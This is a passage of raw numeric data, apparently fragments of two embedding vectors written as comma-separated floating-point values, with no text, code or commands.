0.009697744,-0.020907268,-0.0115176765,-0.019598499,-0.0136564905,0.003422955,-0.011087472,-0.0105316425,-0.017234165,-0.0039507174,0.038821384,-0.01070264,-0.01004081,0.0067606433,0.008742901,-0.01964777,0.012963632,-0.012793445,0.008627317,0.007687602,0.008243326,0.01458023,-0.0005369159,0.009033141,-0.0014847107,0.0076415176,0.019724006,0.009934161,0.011750005,-0.010318982,0.1089901,0.020775013,-0.014457432,0.0049106246,0.001569232,0.02556156,0.04932338,0.006196495,0.006631336,0.023969831,0.018150501,0.0022261783,0.009689608,-0.0015882205,-0.022688163,0.020343728,0.02472855,0.011405808,0.013744307,-0.020325826,0.016319172,-0.034102492,-0.022306576,0.00045771318,-0.002159085,-0.047061197,0.008827519,0.0294775,-0.013804014,0.009435452,0.010567782,0.01045946,0.031156473,0.008127875,-0.021019507,0.005970521,0.01714944,-0.00809033,0.009769231,0.0044392413,0.00273165,0.009844273,0.0037717118,-0.022801274,-0.026977513,0.0064587323,-0.0008745696,-0.018358149,0.0048971632,-0.019347677,0.014479713,0.011511616,0.019070948,-0.010833051,0.019558558,0.00069503917,0.0009416896,-0.0021558017,-0.008011569,-0.00938474,0.035625625,-0.019845426,-0.0052325963,0.010775914,0.033400387,-0.0018434015,-0.017992413,-0.0050142435,-0.058636,-0.035168555,0.0155217005,-0.017672477,0.006740184,0.01151754,-0.013429032,0.024333328,-0.002596712,-0.01323144,-0.01274702,-0.005483464,0.020153776,-0.00060671184,-0.006876445,-0.0049372055,0.021754405,0.00468139,-0.008184174,0.0061516794,-0.0060937414,-0.007694591,0.0033253185,0.0069645704,0.009777532,-0.011006148,-0.020116478,0.019329255,0.024183277,-0.022273973,0.015562694,0.018100906,0.009058009,-0.0010145657,-0.00989058,0.008890101,-0.010577547,-0.015261746,-0.0048308996,0.009536165,-0.0021129567,-0.010537431,-0.008658952,-0.007651796,0.0026813303,0.0033329148,0.005715326,-0.0034848873,-0.008008178,-0.029113539,0.025917709,-0.013340259,-0.018373173,0.009754013,0.019321466,0.027977083,0.0018812981,0.026555762,0.0057135364,0.0062705493,0.0063254763,-0.0027094637,0.005692857,-0.046986885,-0.0059851846,0.0019360405,0.005665903,0.017639054,0.019642545,0.0052684625,0.01303718,0.0054577845,0.02002013,-0.0009119216,-0.0111412695,0.014213085,0.010312268,0.0011841735,0.016132122,-0.0013715194,0.012056512,0.004794705,-0.016638568,0.0067203874,0.012160466,-0.012001211,-0.01727867,-0.0280742,0.008822715,-0.010890617,-0.02534519,-0.013451264,0.009855322,0.0024502114,0.022276642,-0.037716698,0.018550709,-0.0039393147,0.007578177,-0.002560309,0.00058454485,0.020992965,0.009599476,-0.014355433,0.005092644,0.026042627,0.005173244,-0.004152839,0.011034003,0.00016567585,-0.016237242,-0.00023001106,0.019156484,0.008748663,0.0032964677,0.026919771,0.010089449,0.0013181188,0.00856257,0.0060903286,0.002883475,0.030116476,-0.017072605,0.026088161,0.0047249724,0.021089034,0.0050854213,0.0054568974,-0.0372294,0.03786347,-0.044594415,-0.046459578,-0.012530483,-0.0009034978,0.0043508583,-0.0011231626,0.010886545,0.0063172304,0.0023882266,-0.006531313,-0.007828654,-0.013460443,-0.003115359,-0.00083422416,-0.0035289188,-0.010754543,0.0031330262,0.020807602,-0.022115063,-0.011779718,-0.02774579,-0.003298787,0.006295937,-0.022628771,-0.014854644,0.005437223,-0.0003546138,-0.0022585995,0.0051199114,0.016466605,0.013877891,0.0012334957,-0.0014910775,0.0069713932,-0.012971787,-0.026825616,-0.009856313,-0.0069851726,0.003676456,0.015416638,0.0022062932,0.008704963,-0.006212777,-0.013236181,-0.0039128643,0.000009244889,-0.028461648,-0.004961188,0.029241523,0.013453712,-0.024576237,-0.018754216,-0.020837475,0.01574839,-0.02954557,-0.0253079,-0.014394312,0.0043399306,0.008234895,0.0026144884,0.00999377,-0.0028175889,-0.00046581568,-0.004099845,0.0154782105,0.02890097,0.003833338,-0.01145904,0.022201454,-0.0070823366,-0.009113329,0.0021758864,-0.014955531,0.008702344,-0.023915598,-0.003037005,-0.028659225,0.005923421,-0.006181173,-0.0020958455,-0.005019488,0.012991977,0.00007364673,-0.028659703,0.021396667,-0.008933681,0.0057294643,-0.0011121177,0.027855296,0.017085535,0.021059362,-0.072659805,-0.0011709968,0.036820482,-0.00088510953,0.00004598365,0.0023839604,-0.014907964,-0.06513262,-0.017837496,0.043906413,-0.008133371,-0.022586958,-0.030696074,-0.0001986447,0.014935142,-0.010167135,-0.0028212739,-0.009054417,-0.0018900849,0.007747091,0.01842894,0.016572814,0.0012405263,0.0036428198,-0.0022002084,0.0005730127,-0.0046040686,0.014051028,-0.00007666341,-0.0008080228,-0.00087106007,0.024532666,-0.0097166,0.0027025454,0.0039725997,0.00014344955,-0.011384742,0.014251528,-0.010206491,-0.021799445,-0.022888206,0.012379284,-0.016568808,0.021509685,-0.0030491878,-0.009851226,0.018100085,-0.00005103198,0.13043578,0.022075754,-0.0017728168,-0.009818573,-0.016774485,-0.009171315,-0.01573604,0.01907806,0.0018061753,0.00039216486,-0.001325981,0.00690743,0.015224158,0.0030448583,0.017686654,-0.032381695,0.0019474811,0.1234784,0.009276919,0.033863332,0.017881101,0.0014657195,0.023936406,0.0041722073,0.021857388,-0.085178524,0.004060713,-0.030505376,0.010632035,-0.008355446,0.007035136,0.01387277,0.0033030182,0.0043201353,0.0011986463,0.0065886877,-0.006896025,-0.0017122442,-0.015369338,-0.0017972039,0.014768358,-0.032050967,-0.008182165,0.017484704,-0.004696349,0.022379577,-0.0057113348,0.005593034,0.012387225,0.030822307,0.028303403,-0.0067990916,0.012492215,-0.025942996,0.009310321,0.0057571717,-0.0012002423,0.022496173,-0.022757825,0.00907416,-0.0069220806,0.013957916,-0.021310426,0.01743245,-0.0038012029,-0.0072934204,-0.009625853,-0.013446758,0.025856895,0.013888544,0.0103014745,-0.007497269,-0.01243498,0.009758542,0.0052541816,0.002104722,-0.0039164256,-0.014611169,0.024106251,-0.018490817,0.026372636,0.021225821,-0.02214846,0.006884765,0.016078753,0.020944612,0.0073341164,-0.0032113797,-0.001169199,0.0078989435,-0.012346568,0.021236407,0.007715391,-0.008717587,-0.008305238,0.009678625,0.0044602733,0.011306211,-0.00053810404,0.0036155747,-0.03241515,0.01714281,0.006960257,0.010192517,0.007640623,0.005003852,-0.0028109734,0.0006967861,-0.012608681,-0.0059031546,0.010148731,0.008401636,-0.00001782848,0.0024369047,-0.014295319,-0.016974833,0.02322436,0.008549602,-0.029370228,0.0022117582,-0.0046491413,-0.013447506,0.020805296,0.008104801,-0.0326781,-0.008056598,-0.0045999167,-0.0101227,-0.027147347,0.008047229,-0.013894917,-0.023210315,0.018558083,0.03196928,0.015071211,-0.017164795,-0.0028588548,-0.041650217,-0.019083675,-0.002400982,0.008219739,0.025790952,0.015545195,0.018106377,-0.016009005,-0.005828459,-0.0106645,0.014513763],[0.0023482637,-0.0018655031,0.010465538,-0.013560591,-0.0037419936,-0.017387206,-0.0067430185,0.025265131,0.010413247,-0.002625929,-0.0120625915,0.0199419,-0.00086113904,0.023100503,-0.005667394,0.010065145,-0.010740775,-0.0013474312,0.007429598,-0.016576424,0.006520677,-0.003209663,0.0032188336,0.0008046683,0.013510774,0.015960902,0.0060888184,-0.009749108,0.0013346008,-0.016136562,0.0072389324,0.013202509,-0.011278337,-0.015936995,0.0013777001,0.008997429,0.0020038025,0.012483695,0.0075784638,-0.011282235,0.010411203,0.0014992617,-0.024776742,0.0017247584,-0.011457238,-0.013987977,-0.001425027,-0.008460488,-0.019494265,-0.0042944523,-0.0031291726,0.0039759995,-0.0045881053,0.017785322,-0.0076569966,0.00878395,-0.009906741,-0.025788547,0.03495182,-0.011193243,-0.025190495,0.00084642123,-0.0071630925,0.0063911155,0.027141713,-0.0046653906,-0.0038737755,0.006013514,-0.0143211195,-0.012084049,0.030161772,-0.007919369,-0.0027672637,-0.0011878763,0.00047275022,0.004124503,-0.0067562964,-0.0073706107,-0.014845438,-0.010792145,-0.030262286,-0.00048285,0.015656928,-0.003629125,0.0027834862,-0.00903513,-0.015322823,-0.009074397,0.0021484832,0.0019487104,-0.01910423,-0.011547312,-0.010139672,0.0021872823,0.0066668135,0.011711692,0.012555601,-0.00018300518,-0.0011979527,-0.015941327,-0.0037282633,-0.006099292,-0.018776651,0.010947649,0.012408513,-0.0025532467,-0.010973103,0.0075860796,0.0013924584,0.013452421,0.00055595627,0.004234019,0.015706014,-0.008302514,0.018981963,-0.008389573,-0.0051968326,0.016189475,-0.015816793,-0.013030976,0.016122406,-0.0026984056,0.012199295,0.0031343165,-0.0050105792,-0.0058947206,-0.0026656007,-0.008566804,-0.0043013794,-0.021258704,0.000342879,0.015147861,-0.009369172,0.005824207,0.0012747648,0.002942737,0.01028528,0.0019646697,0.011093026,-0.029323801,0.010896662,0.012805502,0.021921331,0.013531269,0.009248835,0.011200944,0.0026528535,0.016354002,0.019243205,-0.0027888156,0.011087934,0.008262313,-0.0025022482,-0.008828079,-0.009142802,0.0026614876,-0.020566294,-0.0014179125,-0.0021535528,0.022463992,0.002952203,-0.02107094,-0.008237971,0.018455917,0.006714188,0.014264705,-0.00799023,0.0043070223,-0.007038201,-0.017017012,0.010223202,0.034504354,0.013652498,0.0013689002,-0.0041597583,-0.016300123,0.017451609,-0.01910056,-0.0034456619,0.02830889,-0.011517057,0.03252836,-0.007702533,0.0007775744,-0.0008217487,0.016921699,-0.0077450485,0.025353715,-0.0015686459,0.012129089,-0.004934193,-0.009461877,-0.015959786,-0.010535795,-0.008331319,-0.017215665,-0.010311956,0.12717189,-0.023153204,-0.016186876,-0.007371359,-0.0028941636,0.0036838655,-0.02220542,-0.01241789,-0.0047420063,-0.021624127,0.013215232,0.0010516795,-0.008584107,0.013147737,-0.0036398214,0.034021646,0.007530987,0.015788691,-0.0864753,0.014364519,0.018412694,-0.014251744,0.012123285,0.0070255906,0.0026528311,-0.008078645,-0.00013005051,-0.024961371,0.011244251,0.016084364,-0.00840479,0.006499595,-0.032131407,0.014174668,0.016227158,-0.039790414,-0.0066704317,-0.009112517,-0.035020087,0.010440614,0.003044206,-0.000046116078,-0.012401654,-0.012112007,0.01149163,0.0015237512,0.012050409,-0.0114409365,0.0010929566,0.0005167865,0.0123072835,0.003673837,-0.024704155,-0.013869861,-0.006754637,0.00216173,0.024646206,-0.0065844967,-0.008262635,-0.006824719,0.007301815,0.0141249355,0.032481495,0.0038767417,0.021402603,-0.024770632,0.020256162,0.013351177,0.0064915745,0.009225246,-0.031947065,-0.014193875,-0.0115554985,-0.0342679,0.005941371,0.013418464,-0.021600306,0.014852743,0.004947062,0.011139616,0.00070640945,0.02004017,-0.010152036,0.0012639537,0.0012758028,-0.010885238,-0.018643863,-0.014505073,-0.004382187,0.036118932,0.010710177,0.018019168,-0.0011258837,-0.010419028,0.0069527323,0.029450994,-0.0032067867,-0.0040032626,-0.013482315,-0.013517709,0.021030845,0.01333437,-0.0052912384,0.0084811,-0.01065055,0.03566168,0.0012590501,-0.010806432,-0.0070707416,0.0023501613,-0.009969876,0.021496989,0.0077939634,0.0011990436,-0.014809377,0.014621686,0.006065184,0.011803439,0.007840555,0.016081126,-0.017194094,0.003232067,0.0124584995,0.008266998,-0.0058424934,-0.016572788,0.0003977895,-0.009920669,-0.008296457,0.038047038,-0.00460552,-0.006753475,0.005472248,0.010422597,-0.025450276,0.011025183,0.020552032,-0.02026919,0.008790138,0.003206352,0.014117849,-0.0037523357,0.03827673,-0.0030286347,0.014805174,-0.023148188,0.011581511,-0.001923578,0.014661199,-0.008341581,-0.010645435,0.015241225,0.009838361,-0.011808612,0.003349765,-0.016415985,0.020166239,-0.008575657,-0.01373009,-0.028102275,0.013069719,-0.02573125,-0.0063889264,0.031035395,-0.0017021912,0.01634835,-0.004885055,0.090583965,0.0013198339,0.0012193794,0.014183217,-0.006872618,-0.01741269,0.010808564,0.023277989,-0.008545159,-0.007532149,-0.0147530595,-0.018588385,-0.008613773,0.023509646,-0.0044364166,-0.010660011,-0.025794338,0.011620124,-0.015572497,-0.012203514,0.03445364,0.0028646898,-0.018323379,0.01391118,0.01124521,0.016218241,0.007070774,-0.0076268804,-0.019243741,-0.021327127,-0.012935405,-0.01771382,-0.000097398646,-0.018034793,-0.010804271,0.003983629,0.008808873,0.0077964766,0.015737409,0.0040260213,-0.0049490067,-0.010414548,0.0039650737,0.0137308985,-0.009045432,0.01914806,0.017702179,-0.0099749435,-0.0041868365,-0.0065182243,0.0012417675,0.0014544415,-0.018861905,0.014123269,-0.03222238,0.023488255,0.007582114,-0.023332532,0.009131951,0.02262379,0.031936023,0.01651196,-0.023704894,0.017652288,-0.00007065265,0.027954243,0.0039353305,0.0013683857,-0.028543852,-0.002905284,-0.0052369866,0.03687374,0.002751214,0.01654189,-0.0014124352,-0.0072692763,-0.00890608,-0.01859393,-0.008919628,0.018361239,0.0059934775,0.020332031,-0.0006267842,0.019861704,-0.010847548,-0.005465131,0.0022653928,0.0023059056,0.02066691,-0.023019066,0.030493606,0.004390761,0.033471625,-0.014804494,0.0154587375,-0.02906385,0.018641183,-0.0064729895,-0.0020986877,0.016727576,-0.02280135,0.015752451,-0.009797794,-0.012287515,0.000089808316,0.0010934644,-0.016908841,-0.012770134,0.004230725,0.014821803,-0.011301014,-0.0014943316,-0.009780236,0.012050147,0.012522989,-0.0028816394,-0.0026139237,-0.0102048535,-0.02132867,0.027875317,0.026320562,-0.0031320993,0.015719932,0.010048949,-0.02143912,0.025515476,-0.0028035704,-0.0033573816,-0.0073564798,0.021200685,0.010735704,0.029319717,0.0070057446,-0.043710805,-0.012499912,-0.004442028,0.0052873483,-0.032858845,0.036578674,-0.0007281863,0.00919503,0.0019148666,0.020768302,0.010784036,-0.0041937693,0.028991664,0.016310936,-0.006294759,0.025021112,-0.01707614,0.0019647097,-0.0013084199,0.0012640513,-0.011675462,-0.00043699075,-0.0035524962,0.0143640265,-0.014152448,-0.020459035,-0.0076514846,0.02032621,-0.024998035,0.0045233658,-0.007867409,0.002542116,-0.0037105805,0.0050956905,0.09832157,-0.0015074811,-0.02229393,0.00051466445,0.0075031496,-0.0048500067,-0.00686346,0.011627744,-0.0068268045,0.02515336,0.009087745,-0.0075114123,0.011096481,0.016769547,-0.014534694,-0.009086895,0.004162459,-0.012376294,-0.012338337,-0.0016921149,0.015196611,-0.010988848,-0.024377901,-0.027355157,-0.018493831,-0.0123911165,0.020956647,0.020689618,0.002762353,0.0079395175,-0.00680255,-0.0035611473,0.0010977335,-0.004721511,0.0076363776,-0.0028749208,0.00074775366,0.003363686,0.0022508134,0.01972872,0.014358013,-0.0048212036,0.02549809,0.017875917,0.009448789,-0.011956253,-0.020420482,0.013495079,0.0059612673,-0.0069580767,-0.021297183,0.0017826057,0.010195772,-0.0003580681,-0.009992349,-0.017748894,0.020125508,0.018649805,-0.036572605,0.011933152,0.011050777,-0.0030863401,-0.0068740286,-0.030057196,0.0047545196,-0.003135601,0.014103716,-0.02282197,-0.0022693619,-0.03116549,0.029204765,0.00031816465,0.021450832,-0.0021602693,0.0079438025,0.004594825,0.0033830514,0.018027615,0.018154753,0.001365598,0.021403158,0.008412479,-0.004871846,0.00012105984,0.002476243,0.001967213,-0.002619256,0.017689604,0.007286543,-0.019393133,0.031346295,0.008535848,0.007750463,-0.0007617133,0.00073636544,-0.0038008513,-0.003768456,-0.0106904255,-0.00029844997,0.007328152,-0.0010810208,-0.02719476,-0.018202826,0.030836247,-0.0032841011,-0.006908438,0.0030046522,0.0095385,0.009594707,-0.011442284,0.009098479,-0.06671755,0.0043220096,0.007439272,0.02534895,-0.010411789,0.03224406,-0.033478446,0.012268518,-0.009620106,-0.017833658,0.0064237085,-0.0071524386,0.004282624,0.011151851,0.016326785,-0.0023513334,-0.021391658,-0.033393905,-0.004583345,-0.0388615,0.019772284,0.022330975,0.0026387784,0.013231734,0.005127051,0.021425337,0.002486322,0.0025665758,-0.008274188,-0.0012992625,0.008480376,-0.00059130945,0.007447411,0.0014597537,0.012646929,-0.010987185,-0.004663039,0.0040152227,-0.0044112667,-0.006214094,0.01937383,-0.019169815,-0.027636973,-0.011893048,-0.013984683,0.017205792,-0.034296736,0.0013097723,-0.008221624,0.02019944,-0.017395802,-0.0052753817,0.009570974,-0.004378483,-0.021697154,0.005311365,-0.008618797,0.029287508,-0.011033651,-0.0042071114,-0.011613836,0.019071586,-0.000273339,-0.0014329974,0.007239619,0.01706765,0.023252936,-0.0017711661,-0.0057747834,0.00804405,-0.01562541,0.023143565,0.013669168,0.013235451,-0.0018047441,0.008101723,0.0072771073,0.017659675,-0.0078080944,-0.016165456,0.004874544,-0.023642723,-0.0043082223,0.0031736637,-0.003539432,-0.016644694,0.030690596,-0.015943991,-0.009266569,-0.024336297,0.00041845313,0.0021518816,-0.022108829,0.0012807291,-0.001209825,0.00215239,-0.018538898,-0.03179437,-0.020060906,0.03190114,0.012237936,-0.01912383,-0.009701443,-0.027059237,-0.021497468,-0.013309203,-0.011180343,-0.017736552,-0.008806704,0.029262308,-0.007871768,0.029823605,0.003190736,0.007270141,0.01954653,0.036006823,-0.0021816518,0.014630761,-0.0074677146,-0.01859948,0.010508703,0.015493604,-0.0046997718,-0.037189856,0.0027561325,0.018685289,-0.012804131,-0.016267385,0.00025413602,0.023593731,0.019516878,-0.006261207,0.0007361022,0.0010964072,-0.015531901,-0.029443594,0.013636145,-0.02105095,-0.010617055,-0.016699357,-0.0066160676,-0.012439035,-0.005541094,-0.0064244736,0.018988404,0.010242936,0.0007865858,0.0059324247,-0.0027546224,0.023018114,0.008420079,0.011497647,-0.02219639,-0.020627165,-0.044050287,0.027355723,-0.011941124,0.0063533094,0.0006687675,-0.010832942,-0.031273346,0.0047080903,0.0051247217,-0.008886868,0.009494186,0.008865873,-0.05354931,0.026359472,0.0011263908,0.01266492,-0.0050026006,0.000058866983,-0.014657443,-0.0146745965,0.014297005,-0.012242986,-0.046257626,0.002075602,-0.0020244175,0.00007972615,0.004787469,-0.013852244,-0.022541733,0.013206835,-0.0095299035,0.012610314,0.03012295,-0.0035794964,0.0087387785,-0.008371145,-0.008850994,0.004974002,0.004074175,-0.03205554,0.0013680649,0.003243269,-0.0011752022,0.010087083,0.0070179515,-0.0030043563,0.030704917,-0.00017416444,-0.036700323,0.012487543,0.009704521,-0.009385183,-0.0008516638,-0.014591808,-0.011224768,-0.02216101,0.0014708332,0.0044266125,0.009906288,-0.0019495707,0.00066065014,0.0132871,0.009330735,-0.007718371,-0.018377224,0.013705976,-0.0013447194,0.010675452,-0.034840062,-0.0057532853,-0.008902932,-0.01591198,0.007045206,0.012451288,-0.00061455334,0.00883631,-0.02250391,0.013047118,0.0022432643,-0.035100203,0.0019579502,-0.009355583,0.021435233,-0.01309597,-0.008670994,0.0069882195,0.0022629306,0.015829327,-0.00978179,0.0014986058,-0.0029069905,-0.01103267,0.006543605,-0.012469786,-0.027157899,0.0021116973,0.021772975,-0.03381542,0.0037321942,-0.014929505,-0.002187408,0.011399218,-0.03877166,0.0017574694,-0.002219966,-0.026902685,0.025712583,0.015024675,-0.0083939135,-0.011239276,0.03106242,0.016368454,0.0026307753,-0.0075219623,-0.015575652,0.022852356,-0.013406107,0.021960756,-0.008092964,0.009721541,-0.0022503277,-0.0060388674,-0.0035332607,-0.018021451,0.027044948,-0.013858368,0.002052465,0.018027535,0.013039041,-0.0017034658,0.015102711,-0.011999998,0.015586799,0.01231089,0.0014395553,0.023803653,-0.0056128274,0.02561982,-0.00074071705,-0.00056765147,0.011183583,0.0024207798,-0.011560462,0.0148632955,0.018192181,0.0012665269,0.0016754484,0.0055934316,0.0063828244,-0.009428232,0.022404058,-0.022752356,0.008543167,-0.016240569,-0.02365804,-0.007096689,0.010560685,-0.022081707,-0.02693451,0.017032059,0.011341927,-0.010012138,-0.013768502,0.0063557248,0.003167104,-0.01708607,-0.00651194,-0.0230745,0.012032564,-0.007013424,-0.0032489663,0.0055881194,0.027593086,0.01689843,0.01292399,-0.0030799503,0.0052764257,-0.023930768,-0.0015526527,0.011246158,-0.018767433,-0.008560331,-0.012609851,0.019946137,-0.017593088,0.034290258,-0.009859579,-0.0066779023,-0.015163458,-0.0020165797,-0.013331987,-0.009711778,0.013556403,-0.023629053,-0.0077012302,0.0139099555,0.0068832804,0.01876808,0.0010402087,-0.002191901,-0.0010728145,-0.0031157543,-0.0014111324,0.013048358,-0.003304086,0.023338,-0.026444554,-0.015806638,0.0061161816,-0.0027129152,-0.0022792253,0.0014681505,-0.007755599,0.007338363,0.011275636,-0.0044472557,0.013867068,0.014812165,0.0056963284,-0.0045290045,-0.0030101547,-0.008970035,-0.0021083432,-0.013272445,-0.019082068,0.007668747,-0.022499993,0.021917518,-0.010885566,-0.0012693229,0.014084696,-0.0015962966,0.0033821657,0.0050782063,-0.006638966,0.017017666,-0.015626112,0.020707827,0.0069833053,0.021487005,0.0038100865,-0.003997616,0.028520238,-0.0054223775,-0.040393177,0.028562237,-0.014751366,0.0004977228,-0.00082425505,-0.013233532,0.022717403,0.026182108,0.0040859063,-0.0059491005,0.010034371,-0.0048570377,0.015260442,-0.0064780614,0.00058475544,0.034290884,0.08501419,-0.01109597,-0.0011524807,-0.0015306821,0.0122374715,0.0024352241,-0.0065019815,-0.0007525465,0.024410853,0.005855447,-0.016118556,0.016365997,-0.019473992,0.008716042,-0.009621784,-0.018474713,0.004153861,-0.007475556,-0.0166404,0.0026411854,-0.015975876,0.019245423,-0.0008328868,-0.033446755,-0.045705024,0.027166529,-0.012702796,0.0012758381,-0.018113464,0.007866034,0.005713906,0.008358086,0.0009311408,-0.008186112,-0.0029133365,-0.0151138855,-0.014631742,0.027800087,0.010120045,-0.005346083,0.008561339,0.0076009696,-0.018113252,-0.033073124,0.0030706245,-0.013543166,-0.03466958,-0.014269635,-0.010121193,0.0002785504,-0.02600568,0.0032664766,0.008918712,-0.016095214,-0.016922347,0.015920086,0.025490057,0.0014339077,0.020644218,-0.015015164,-0.0044501163,-0.0018084154,0.013178433,0.029714026,0.011376475,0.01872482,0.012220614,-0.020964554,-0.0015753036,-0.013217725,-0.019646736,-0.014286874,-0.002206593,0.017096158,-0.003783404,0.0047088643,-0.015171442,-0.007545337,0.012230449,0.016254619,-0.0121134,0.0030848114,-0.012012116,0.010079391,0.0065959455,0.0055002137,-0.024720607,0.012691717,0.016959542,-0.0037576,-0.0041876966,-0.029804362,-0.012923985,-0.015343088,-0.023713915,0.016338559,-0.014763204,-0.012847165,-0.020027414,0.0071431417,0.013342441,-0.023131583,0.0053297775,-0.0018831801,-0.003525459,-0.004342241,-0.0059599546,-0.012348009,0.013307427,-0.0046047918,0.015919935,-0.0029092748,0.01863729,-0.01586124,0.032099135,-0.0163155,-0.02106642,0.007801924,0.0032540653,-0.009441198,-0.0146358665,-0.03165297,-0.006098682,0.010815134,0.009012537,0.012695826,0.023696458,0.029470831,-0.008876529,-0.006760081,-0.00009089749,0.014529834,0.012896055,-0.004166153,-0.00043652224,-0.0065163625,-0.021563562,-0.023018176,0.008088357,-0.023664214,-0.0121038845,-0.018445464,0.007434063,-0.023650995,0.01586277,0.0129169775,0.014856067,0.00071623904,0.021142697,0.015791716,-0.013097992,-0.007098314,0.0005794866,-0.004668292,0.008522931,-0.0013119795,-0.02081339,-0.0067966073,-0.0106869135,-0.011701734,0.017671607,-0.009841485,0.0076024765,-0.010568095,0.021307511,-0.03358086,0.014456723,0.016726041,0.0025083383,-0.022480914,0.023375971,-0.008837575,0.0002835243,-0.007850369,0.00006732311,0.015127139,0.029472943,-0.005457712,0.017342571,-0.012222519,0.012050711,-0.022204258,0.023988843,-0.009162722,-0.008552408,-0.020949282,-0.013013248,-0.003873161,-0.0066162003,0.012459561,0.0033911485,-0.0024061112,-0.008652981,-0.015137904,0.024358785,-0.037485015,0.009794823,-0.004896233,-0.0020175562,0.002566055,-0.0007765537,0.006353923,0.013859664,0.0054051206,-0.0021835554,0.009229217,-0.01363839,0.016219247,-0.007331547,0.021711124,-0.018556416,0.00011583094,-0.0022343155,0.0045792004,-0.0024585929,0.01896389,0.0095972065,0.012916303,0.0077630854,-0.017386554,-0.012979841,-0.005521287,0.006262197,-0.03099107,0.08398035,-0.002193658,0.012720141,0.0030435845,0.0025359192,0.00937356,0.018846206,-0.009953245,0.03528712,0.023180148,-0.0038640497,0.0011426108,0.017299155,0.011268851,-0.0040229326,0.011502502,0.010013938,0.019042838,0.0033566833,0.0052569155,-0.00891583,0.0017712576,-0.00020276727,-0.014506382,0.007008446,-0.01318295,0.007869663,-0.022691537,-0.012804197,-0.0008396287,-0.008789131,-0.01609362,0.009711922,0.007899522,0.023439141,-0.02378414,-0.009988137,0.02196354,-0.00069106586,-0.0066160103,0.04382343,0.0027390737,-0.011265345,-0.0010201535,0.027249051,-0.014471617,0.089126915,0.028245613,0.019887451,-0.0061064214,-0.002608524,0.007991599,-0.037849218,0.013547628,-0.0070151878,-0.000207215,0.01568715,0.02566533,-0.012826179,0.008335518,0.0153922485,-0.011293122,-0.003334576,-0.0028160422,0.002919613,-0.011837203,-0.015594413,0.014952847,0.011127768,-0.019186517,0.0012387387,0.018089507,0.0137918275,0.01178947,0.011582078,-0.0057983263,-0.013273263,0.013370066,0.01840356,0.03459345,0.012254578,-0.063016556,0.010902134,0.19893007,0.0011326021,0.008856766,-0.0045972643,-0.0004494773,0.0032140533,-0.071367115,-0.0033195228,-0.006263227,0.0018674274,-0.006440031,-0.01999822,-0.0066083255,0.03623388,0.008250573,0.017220773,0.015961608,-0.036710255,0.0053321524,-0.019729894,0.015029037,-0.006618747,0.013445576,0.011647945,-0.033102226,-0.0010362316,0.022018446,-0.024499105,-0.013378794,0.018135611,0.00021738642,-0.0062367567,0.0009498114,-0.0059300507,-0.033106793,0.010753064,0.0023101335,0.002451221,0.0017908681,-0.024134714,0.01038094,-0.006257659,-0.016060181,-0.018415684,-0.16051577,-0.00026479876,0.021640062,-0.023879163,0.017926997,0.011324385,0.016844206,-0.01590792,0.0035842638,-0.024404183,-0.01272059,-0.00275173,0.015615281,0.00054797856,0.0064718667,-0.010832799,-0.021930154,-0.004115219,0.012867807,-0.008118756,0.017453201,-0.003158729,-0.010486089,-0.012638355,0.006874646,0.004580051,-0.011640877,-0.0011664596,-0.019814102,0.016629746,-0.010497822,0.030242596,-0.009721911,-0.004899227,-0.047354575,-0.019867618,-0.0055346335,0.019895768,-0.023290582,-0.008303529,-0.008244357,-0.005687621,0.00083086424,0.006349315,0.0034046038,0.026198167,-0.009731206,0.0029582605,-0.0068985284,0.005458222,0.055413887,-0.0011550381,-0.020221999,-0.003815049,-0.0106842695,0.006972106,-0.012892503,-0.017693259,0.0042919796,0.0054885633,0.0035326548,-0.026058536,-0.014272774,-0.023423245,0.009880104,-0.01665491,0.0030970396,-0.035721652,0.0032107169,-0.0065276055,-0.0042792913,0.0069143707,0.019460216,-0.032324146,0.012869478,0.026419032,-0.013773395,0.006182647,0.009831851,-0.0119119175,-0.021725146,-0.020027658,0.007527026,-0.021231405,-0.023014503,-0.00420743,-0.005521832,-0.0069101886,-0.00308234,-0.00807474,0.00312826,0.007711549,0.025990048,0.015687218,-0.010758348,0.010946006,0.014188848,0.020091165,-0.031146955,0.018688835,-0.00034831968,0.008838091,-0.02809491,0.019424303,-0.019131647,0.00077744876,-0.0025388817,-0.018135393,-0.024928356,0.021195672,-0.013295133,0.014262005,-0.008993632,-0.022188447,-0.017911628,-0.030951595,0.025414014,0.010404275,-0.0033006878,-0.015138844,-0.028071057,-0.015006557,-0.002789293,0.00029310986,0.048701357,-0.01059419,-0.042907786,-0.009082094,0.013767222,-0.028509809,-0.010596817,0.005176299,-0.00528218,0.015561356,0.0036036805,0.008762754,-0.010397455,-0.009395046,-0.017098393,0.008980539,0.019366652,-0.019108659,-0.0018268825,-0.020566082,0.03152177,-0.013580797,0.008607211,-0.019198833,0.008293398,0.001085002,-0.016342884,0.042845935,-0.0048796213,-0.018423779,-0.025969118,0.08445763,-0.017681831,-0.020324484,-0.005333739,-0.008432459,0.0048608757,0.03366445,-0.01120274,-0.02431007,-0.021936072,-0.02911475,-0.009769784,-0.00025506428,0.0062141516,-0.00062985753,0.027962746,-0.0010455457,0.018887322,0.0035310187,0.00767266,0.015179555,-0.024273537,-0.004748016,0.036556553,0.027078746,-0.014795774,-0.0040809726,0.005841512,-0.012158702,0.010710401,-0.0073983017,0.004473018,-0.012484217,-0.004959906,-0.0062807645,-0.041441616,-0.0072775087,-0.0004338475,0.01730085,-0.0016208949,0.004345644,0.011640773,0.014017739,-0.0024627268,0.019118484,0.028937722,-0.015023321,0.018802833,0.011813512,0.0077505717,-0.010292477,0.022078257,0.0075529767,-0.031955764,0.0003908826,-0.025119012,0.01618026,-0.00828081,0.006158824,-0.0011371335,0.01924245,-0.013830294,0.00089569757,0.006861107,0.0006388105,0.014160797,-0.0053734956,0.019178474,0.0063831126,0.039484642,-0.0034244861,0.015081784,0.0046568215,0.01010302,-0.0120599065,0.0008334128,-0.022854859,0.00450619,-0.012474926,0.0074205124,-0.0018384531,0.0017149413,-0.00045644876,0.02310178,-0.032745678,-0.065342136,-0.0021498005,-0.020369459,-0.029137706,0.0136814825,0.017940735,0.0016656986,0.014624949,0.0040692105,0.018580524,-0.022103736,-0.008503644,0.00950878,0.0076886327,0.00968068,0.0052394164,0.014531748,-0.012685654,0.005260073,-0.011656782,-0.039910767,0.003599142,-0.018510237,0.010992687,-0.032148015,-0.011120344,0.0000728321,0.007332001,-0.028090402,0.00901719,0.06988428,-0.031751,-0.0065169004,-0.0005441413,-0.021019392,-0.017824097,-0.015504118,-0.013636189,0.0028367473,0.058117736,0.011386997,-0.006376311,0.018423088,-0.0038863225,0.022147814,-0.007436325,0.049030256,-0.006825892,0.